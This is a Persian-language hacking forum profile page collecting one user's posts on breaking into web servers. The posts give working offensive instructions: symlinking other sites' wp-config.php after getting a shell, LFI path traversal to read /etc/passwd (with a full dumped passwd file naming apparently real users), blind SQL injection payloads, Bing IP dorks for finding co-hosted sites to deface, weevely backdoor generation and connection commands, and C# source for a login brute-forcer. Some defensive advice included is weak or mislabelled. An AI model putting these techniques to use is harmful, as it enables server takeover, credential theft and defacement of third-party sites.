رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

Phoen1X

جاویدان
  • ارسال ها

    323
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    30

تمامی موارد ارسال شده توسط Phoen1X

  1. Phoen1X

    درخواست یه پلاگین

    از tamper data استفاده کن خیلی بهتره کل کاراییای اینم داره
  2. برای سرور های ویندزوی اگر از asp یا asp.net استفاده بشه باید از شلر های aspx یا asp استفاده کنید اگرم کامپایلر php روش نصب باشه که از شل های php هم میتونید استفاده می کنید خب معلومه طبق گفته دوستان مربوط به کد نویسی شلر هست مثلا اکثرا وقتی از توابعی که کامند اجرا می کنه یا ... استفاده بشه شلر خب قطعا اگر بر روی سیستم شمام اجرا بشه مییشه کامند اجرا کرد خب پس صددرصد انتی ویروس بهش گیر میده شلر b347k هم دقیقا همینطوره از تابع exec , system ... استفاده نمی کنه که کامند اجرا کنه نیازی به آپلود شل دیگه ایی نیست ولی ی وقتی یک سری امکاناتی میخواید که این شلر نداره ی شلر دیگه اپ می کنید تا از امکانات اون استفاده کنید مثل شلر webr00t
  3. سلام باگ lfd وقتی که Cms یا ... میاد و ادرس یک فایل رو میگیره و اون رو بدون هیچ گونه چکی فایل رو دانلود می کنه این باگ رخ میده مثله قطعه کد زیر : <?php header("Content-Type: application/octet-stream"); $file = $_GET["file"]; header("Content-Disposition: attachment; filename=" . urlencode($file)); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 99999); flush(); } fclose($fp); ?> مثلا ادرس اینطوری میشه [Hidden Content]" خب حالا میبینیم اینجا بدون هیچ گونه چک شدنی میاد و فایلو دانلود میکنه حالا اگر نفوذگر بیاد و درخواست دانلود فایل کانفیگ سایت رو بده دیگه تمام راحت در اختیارش قرار میگیره و میتونه نفوذش رو به راحتی به سایت شما انجام بده روش هاییم که به ذهنم میرسه یکی مثل باگ قبل بیایم و کل فایل های دانلودی رو تو ی آرایه بزاریم بعد چک کنیم یا بیایم و دایرکتوری دانلود رو اسکن کنیم اگر فایل موجود بود دانلود بشه در غیر اینصورت دانلود نشه
  4. بله باید باز کنید
  5. خیر هیچ نیازی نیست کی گفته حتما باید 4444 باشه ؟ برای متاسپلویت هم میتونید از این فاروم کمک بگیرید [Hidden Content] * برای خود متاسپلویت هستش
  6. برای ریموت شدن به سرور و رات و ... نیاز به ایپی ولید دارید همچنین بعضی وقتا مودمتون رو بزارید رو حالت بریج هم جواب میده امکانم داره جواب نده
  7. ببینید مثلا وقتی شما از ی سایتی روی سرور شل گرفتید بعد میاید میبینید که ادرس دایرکتوری هوم هر یوزر چیه چون کهه برای هر سایت یک یوز در سرور هست که اگه نباشه و همه سایت ها روی یک یوزر باشن سرور به باد میره خب بعد میاید و دیگه نصف که شما انجام شده و فقط میخواید بفهمید فایلای کانفیگ کجاست که سیم بزنید بهشون مثلا ln -s /home/littlepa/wp-config.phpیا توی کرک FTP همونطور که گفتن به کار میادیا وقتی از bc گرفتید و ... اینم که فک کنم با قبل بهتون گفتم نه ؟ از تابع include و require به وجود میاد که با متود GET ادرس صفحرو بگیرن و هیچ چکی نشه و بعد صفحه اینکلود بشه بهترین روشی هم که بنده برای جلوگیری از این باگ پیدا کردم اینه که صفحات مورد نیازو درون یک آرایه بزاریم و بعد چک کنیم ببینیم اگر ورودی با یکی شون مساوی بود بعد اینکلود کنیم و نبود ارور نشون بدیم... برای ورود هر یوزر هم که کافیه فقط یکم برید کامندای لینوکسو چک کنید
  8. ببینید این فایل وقتی از سرور شل گرفتید بدردتون میخوره که این فایل حاوی اطلاعات مفیدی درمورد یوزر های سایت هستش مثلا ی خط از تارگت بالا که گذاشتید اینه nobody:x:99:99:Nobody:/:/sbin/nologin nobody اسم یکی از یوزر های سرور هست که در قسمت ششم / هست به معنای اینه که دسترسی این یوزر روت هستش این ها برای کرک کردن یوزر ها بسیار به کار میره راهنما اطلاعات با : جدا میشن که هرکدوم از یوزر ها حاوی 7 قسمت هستش قسمت 1 نام یوزر قسمت 2 پسورد هست کاراکتر دوم نشان دهنده اینه که پسورد بصورت اینکریپت شده در /etc/shadow هستش قسمت 3 ای دی یوزر قسمت 4 گروپ ای دی قسمت 5 اطلاعات یوزر قسمت 6 نام مسیر دایرکتوری Home هستش قسمت 8 ادرس شلی که استفاده می کنه
  9. سلام این متود بهش میگن بلایند اس کی یو ال اینجکشن (blind sql injection) به ی حالت پرسش و پاسخ هست شما می گی ورژنت 4 هست ؟ اگه صفحه لود شد یعنی چهاره اگه لود نشد یعنی نیست و باید بگریدید تا جواب درستو پیدا کنید اینجا هم همینطوره بخوام به صورت مفهومی توضیح بدم یعنی برای لود شدن پیج باید حتما دو طرف کویری (یکی رو برنامه نویس یا طراح وب مینویسه بعدیو ما تزریق میکنیم) درست باشه تا صفحه لود بشه و بسیار تاقت فرسا هستش برای همین به نظر من از sqlmap استفاده کنید havij هم خوبه ولی سرعتش پایین تره چون باید کلن همه چیزو حدس بزنید. [Hidden Content](@@version,1,1)%20=%204--+ مثال برای ورژن دیبتابیس 4 که لود نمی شه پنج هم همینطور پس میشه 3 که اکثرا یا 4 هست یا 5 که دیگه این خیلی به ندرت اتفاق می افته که ورژن زیر 4 باشه.
  10. [Hidden Content](@@version,1,1)%20=%203--+ بفرما
  11. سلام مودمتون رو بزارید رو حالت bridge و اگه کار نکرد ای پی ولید بخرید
  12. Phoen1X

    هک فیک پیج

    سلام کلن شما نمی تونید این کارو بکنید و یا خیلی سخته چون باگی به وجود نیمده که شما بخواید نفوذ کنید چون اکثرا فیک پیچ ها خیلی کم از زبان های سمت سرور استفاده می کنن و اونقدی نیس که ی جایی مشکلی بخواد پیش بیاد بعد مثلا نتایجی رو برای شما نشون نمی ده فقط مینویسه وارد شدید ولی مثلا امکان داره که بنویسه کاربر با یوزر و پس فلان وارد شد یا چیزای اینطوری اینجا امکان داره باگ xss به وجود بیاد چون امکان داره چیزیرو فیلتر نکرده باشن بعد شما میتونید نفوذ کنید بازم به ندرت چون پیج ادمینی وجود نداره
  13. نیازی به اسکن نیست دوست عزیز Nslookup site.com توی قسمت Addresses ای پی سرور رو نوشته برای مثال سایت گوگل Nslookup google.com ----> 172.217.3.46 و بعد میرید توی موتوز جستجوی Bing IP:172.217.3.46 سایت های روی سرور نمایش داده میشه میتونید انواع کلمات و ادرس هارو هم سرچ کنید IP:172.217.3.46 "php?id=" IP:172.217.3.46 admin login IP:172.217.3.46 admin و ... بعد از شل گرفتن از ی سایت میتونید به سرور روت شید یا سیم بزنید و کانفیگارو بخونید و به دیتابیس ها کانکت شید و سایتای رو سرور رو دیف کنید روت هم که بشید سرور زیر دستاتونه ))
  14. با سلام دوست عزیز نخواستم چیزی بگم که دوستان متاسفانه یکم جواب غلط دادن میتونید بیاید از cgi شلر webr00t استفاده کنید که خب cat /etc/passwd رو که بزنید میخونه و نشون میده و بعد باید با استفاده از قسمت config **** کانفیگ ها رو بکشید بیرون وقتی میزنید تنها با یک نتیجه روبه رو میشید و اون این هستش که فقط کانفیگ خود سایتو گذاشته و باید پایبیس کنید برای پایبیس هم باید با استفاده از اسکریپت های پرلو و htacces و ... استفاده کنید برای همین گفتم که سرور پایبیس میخواد... ولی خب سیمیلینکش هم مثه سرورای دیگه خیلی سخت نبود ولی به دلیل تازه کاری شما گفتم سایت رو هم از دسترس خارج کردن پیشنهاد من به شما روت شدن به این سرور بود از خجالت هم آب نشید چون که ندونستن عیبه نه سوال کردن
  15. قرار نیست که همه سرور ها سیمیلینک خور باشن اگه اینطوری بود که شرکت های مختلف هاست دهی و ... به وجود نمی یومد این سرور هم از اوناست که کلی پایبیس میخواد و احتمالم داره نشه
  16. احتمال داره از apt-get باشه پس آپدیتیش کنید sudo apt-get update بعد اینطوری میتونید برنامه هاتون رو نصب کننید sudo apt-get "prgramn ame"
  17. این سوالای ساده رو سرچ هم کنید راحت پبدا می کنید از طریق محیط گرافیکیش که خیلی تابلوهه میرید تو تنظیمات و display و سایز مورد نظرتون رو انتخاب میکنید از طریق ترمینال هم که خیلی آسون تره xrandr -s "desktop size like : 1024x768"
  18. ببینید اینها همه توی فایل php اسکریپتی به اسم index.php دارن اجرا میشن و چون از متود get استفاده شده توی وب نمایش میده و ما هم میبیبیم اول ی دعا میکنیم که خدا اون کسی که این اسکریپتو نوشته شفا بده بعد تست می کنیم ببینیم اصلا چیزی فیلتر شده یا نه که خدا خیرش بده هیچی فیلتر نشده (برای یکم لبخند) ببنینید اینها که الان هیچی برای نفوذ توی دست من و شما نمیزارن اما این یک پوشه فایل مهم هستش که اطلاعات یوزر های دیگه رو روی سرور در خودش داره اینهارو میان با استفاده از یک سری شل ها مثل webr00t یا اسکریپت هایی که به زبان پرل موجود هستش استفاده می کنن و کانفیگ تمام سایت های روی سرور یعنی یوزر نیم و پسورد دیتابیس تمام سایت های روی سرور رو در میارن که کار خیلی آسونی هستش بعد دیگه مثلا 150 تا سایت روی سرور بای کار خاصی نیست فقط 2 تا کلیکه ولی بعضی وقتا ینی بیشتر وقتا باید یکم ور برید با سرور و پایبیسش کنید تا بتونید کانفیگ هارو در بیارید بالاخره ارایه دهنده وب سرور اصلا دوست نداره اعتبارش زیر سوال بره ولی خب آسونه باز پایبیس کردنش میتونید با یکم تحقیق چییزای خوبی پیدا کنید منظورم با اینها هستش: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin mark:x:501:501:Mark Keeran:/home/mark:/bin/bash darren:x:502:502:Darren Farrish:/home/darren:/bin/bash donny:x:503:503:Donny Drummonds:/home/donny:/bin/bash adam:x:504:504:Adam Richey:/home/adam:/bin/bash markhome:x:507:507::/home/markhome:/bin/bash markwork:x:508:508::/home/markwork:/bin/bash wynell:x:517:517::/home/wynell:/bin/bash mawdi:x:519:519::/home/mawdi/data:/bin/bash ky:x:520:520::/home/ky:/bin/bash backups:x:523:523::/home/backups:/bin/bash cc_hold:x:524:524::/home/cc_hold:/bin/bash kyoung:x:526:526::/home/kyoung:/bin/bash markimages:x:532:532::/home/markimages:/bin/bash pvp:x:533:533::/home/pvp:/bin/bash mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false dbf_windows:x:560:560::/home/dbf_windows:/bin/bash dbf_unix:x:561:561::/home/dbf_unix:/bin/bash donnytest:x:562:562::/home/donnytest:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin dbf_road:x:597:597::/home/dbf_road:/bin/bash amelia:x:624:624::/home/amelia:/bin/bash sapdb:x:656:656::/home/sapdb:/bin/bash mailer:x:667:667::/home/mailer:/bin/bash clamav:x:100:11:Clam Anti Virus Checker:/var/clamav:/sbin/nologin fun3kids:x:694:1000:C Farrish:/home/fun3kids:/bin/true ntp:x:700:700::/home/ntp:/bin/bash rotary:x:702:702::/home/sprrotary/html:/bin/bash cellie-mart:x:707:707::/home/cellie-mart:/bin/bash adamwork:x:709:709::/home/adam/adamwork:/bin/bash adamhome:x:710:710::/home/adam/adamhome:/bin/bash nellbell:x:715:715::/home/nellbell:/bin/bash matt:x:716:716::/home/matt:/bin/bash rob:x:717:1017:Rob Armstrong:/home/ah-ins/rob:/bin/true steve:x:718:1017:Steve Hailey:/home/ah-ins/steve:/bin/true bruce:x:719:1017:Bruce Armstrong:/home/ah-ins/bruce:/bin/true melissa:x:720:1017:Melissa:/home/ah-ins/melissa:/bin/true beth:x:722:1017:Beth Armstrong:/home/ah-ins/beth:/bin/true monitor:x:723:1018::/home/monitor:/bin/bash christy:x:724:1017:Christy:/home/ah-ins/christy:/bin/true kathy:x:725:725::/home/kathy:/bin/bash testuser:x:726:726::/home/testuser:/bin/nologin trent:x:727:727::/home/trent:/bin/bash razorbackhockey:x:728:728::/home/razorbackhockey:/bin/bash rentals:x:729:729::/home/rentals:/bin/bash rotary_dev:x:731:731::/home/sprrotary/dev:/bin/bash emily:x:732:1017:Emily:/home/ah-ins/emily:/bin/true cci:x:733:733::/home/cci:/bin/bash kyle:x:736:736::/home/kyle:/bin/bash evan:x:737:737::/home/evan:/bin/bash dwverify:x:738:738::/home/dwverify:/sbin/nologin greg:x:739:739::/home/ah-ins/greg:/bin/true select2textsupport:x:740:740::/home/select2textsupport:/bin/bash hannah:x:741:741::/home/hannah:/bin/bash abby:x:742:742::/home/abby:/bin/bash holly:x:743:743::/home/holly:/bin/bash lana:x:744:744::/home/ah-ins/lana:/bin/true jmcdaniel:x:745:745::/home/jmcdaniel:/bin/bash nick:x:746:746::/home/nick:/bin/bash randy:x:747:747::/home/randy:/bin/bash sarah:x:748:748::/home/sarah:/bin/bash svc:x:749:749::/home/svc:/bin/bash rrdcached:x:101:102:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin kalie:x:750:750::/home/kalie:/sbin/nologin dsa:x:751:751::/home/dsa:/bin/bash hacluster:x:498:496::/var/lib/heartbeat/cores/hacluster:/bin/bash nagios:x:499:499:nagios:/var/log/nagios:/bin/sh munin:x:15:17:Munin user:/var/lib/munin:/bin/nologin canada_emodel:x:752:752::/home/canada_emodel:/bin/bash ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin cimsrvr:x:17:1020:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin ricci:x:18:24:ricci daemon user:/var/lib/ricci:/sbin/nologin luci:x:19:27::/var/lib/luci:/sbin/nologin
  19. سلام من نبودم تو این مسابقه که شرکت کنم ولی این باگ بسیار باگ راحت و در عین حال بسیار خطرناک تر که در بعضی مواقع کنترل سرور رو میتونه در درست نفوذگر بزاره خب این تارگتش بود [Hidden Content] خب توی این نوع از این آسیب پذیری به ما امکان مشاهده فایل های مختلف رو میده یعنی چی یعنی دسترسی یک یوزر بیش از حد مجاز فایل etc/passwd یک فایل توی لینوکسه که اطلاعات یوزر های مختلف داخلش هست البته همینطوریم نمی شه ازش استفاده کرد نیاز به یک سری مراحلی داره خب ادرس این فایل اینطوری بود [Hidden Content]index.php?page=../../../etc/passwd اما این ../ از کجا اومد اگه لینوکس داشتید بهتر میتونستید این قضیرو درک کنید [Hidden Content]index.php?page=test این پیج رو ببینید هب ما از اینجا چیو میفهمیمیم اینو که این اسکریپ یا فیل پی اچ پی داره اینجا اجرا میشه /home/thesom/html/index.php خب حالا فرض کنید پشه etc/passwd روی دسکتاپه برای این که هر بار بریم عقب اینطوری میریم ../ این جز کامند های لینوکسیه /home/../../.. حالا اینطوری اجراش میکنیم [Hidden Content]index.php?page=../../../ میبینید که هیچ اروری نداد یعنی اسکریپت داره میگه چیزی خراب نیست و فایلی هم برای نمایش انتخاب نشده پس چون خودمون با لینوکس اشنا هستیم و می فهمیم که الان با ../ رسیدیم به دایروکتوری home میایم ی etc/passwd اضاف می کنیم و اسکریپت به دلیل ضعف امینیتی اون فایل رو نشون میده [Hidden Content]index.php?page=../../../etc/passwd حالا نحوه پچ باگ این باگ رو هم همینطور که میدونید شایدم ندونید از تابع زیر به وجود میاد include باید ما ازین توابع استفاده کنیم تا نفوذگر نتونه کاری رو از پیش ببره strip_tags htmlspecialchars stripslashes فقط برای اخری شاید بعضی وقتا یک سری مشکلاتی پیش بیاد وشما نباید از دایروکتوری های دیگه فایل رو فراخوانی کنید راستی این باگ هم rfi هست نه lfi یعنی remote file inclution موفق باشید
  20. سلام شما یک نگاه کوچیک به این هش بندازید میفهمید base64 هستش که دیکدش هم خیلی آسونه Decoded = c{MZz
  21. سلام چیزی که زیاده ابزاره میتونید از weevely 3 یا metasploit استفاده کنید لینک گیت هاب : [Hidden Content] آموزش : ساخت بکدور ./weevely.py generate YourPass YourFileName.php کانکت شدن ./weevely.py [Hidden Content] YourPass
  22. Phoen1X

    کد های html

    90 درصد مثلش دراومد به جای YourAddress ادرس لینکی که میخواید با کلیک بر روی اون باکس بره بقیه توضیحاتم که فینگیلیش داخلش هست <!DOCTYPE html> <html> <head> <title>Page Title Here</title> <meta charset="utf-8"/> <style> body{ background-image:url('[Hidden Content]'); background-repeat:no-repeat; background-size:100%; background-attachment: fixed; } .box1 { width: 260px; padding: 10px; border: 1px solid black; margin: 0; border-radius:8px; height:50px; margin-left:350px; margin-top:200px; box-shadow:0px 0px 2px black; text-align: center; line-height: 230px; } .box2{ width: 260px; padding: 10px; border: 1px solid black; margin: 0; border-radius:8px; height:50px; margin-left:350px; margin-top:20px; box-shadow:0px 0px 2px black; text-align: center; line-height: 230px; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; <!-- rang morede nazeretoon baray vaghti mouse be roye oon link ya harchizi dakhel jabe bood ro be jay white bezarid --> color:White; } a:active { text-decoration: none; } </style> </head> <body> <a href="#YourAddress"> <div class="box1"><!-- inja harchi mikhaid dakhel jabe namaiesh dade beshe bezarid --></div></a> <a href="#YourAddress"> <div class="box2"><!-- inja harchi mikhaid dakhel jabe namaiesh dade beshe bezarid --></div></a> <a href="#YourAddress"> <div class="box2"><!-- inja harchi mikhaid dakhel jabe namaiesh dade beshe bezarid --></div></a> <a href="#YourAddress"> <div class="box2"><!-- inja harchi mikhaid dakhel jabe namaiesh dade beshe bezarid --></div></a> </body> </html>
  23. سلام سورس کارتون رو گذاشتم مگه نمی گید سی شارپ ؟
  24. سلام هیچ نیازی به یاد گرفتن زبان های دیگه نیست شما میتونید با یاد گرفتن کلاس webclient , namevaluecollection , httpwebrequest به راحتی با دوتا دستور for و ی background worker این کارو انجام بدید سورس تقریبی رو براتون میزارم NameValueCollection namevalue = new NameValueCollection(); foreach (string str in users) { namevalue.Add(userfieldname, str); foreach (string str2 in passwords) { namevalue.Add(passswordfieldname, str2); WebClient brutefrocer = new WebClient(); byte[] ok = brutefrocer.UploadValues(siteadress, namevalue); var okbody = Encoding.UTF8.GetString(ok); if (okbody.Contains(" You have post-installation messages ")) { MessageBox.Show("OK " + str + ":" + str2); } else { MessageBox.Show("NO" + str + ":" + str2); } } } فضای نام های مورد نیاز : System.Net System.Collections.Specialized اما با زبان هایی مثله پایتون یا پرل یا پی اچ پی این کار آسون تر انجام میشه چون شما با محیط گرفیکی سر و کار ندارید
×
×
  • ایجاد مورد جدید...